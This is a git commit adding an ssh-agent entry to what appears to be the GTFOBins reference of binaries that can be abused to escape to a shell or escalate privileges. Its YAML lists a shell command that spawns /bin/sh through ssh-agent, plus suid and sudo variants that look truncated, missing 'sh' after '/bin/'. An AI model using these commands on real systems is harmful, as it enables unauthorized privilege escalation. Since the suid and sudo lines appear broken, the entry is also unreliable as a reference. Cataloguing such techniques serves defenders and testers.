Add ssh-agent

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Emanuel Duss
2023-03-20 17:46:13 +01:00
committed by GitHub
parent 1121363e20
commit 15f69868f6

9
_gtfobins/ssh-agent.md Normal file
View File

@@ -0,0 +1,9 @@
---
functions:
shell:
- code: ssh-agent /bin/sh
suid:
- code: ./ssh-agent /bin/ -p
sudo:
- code: sudo ssh-agent /bin/
---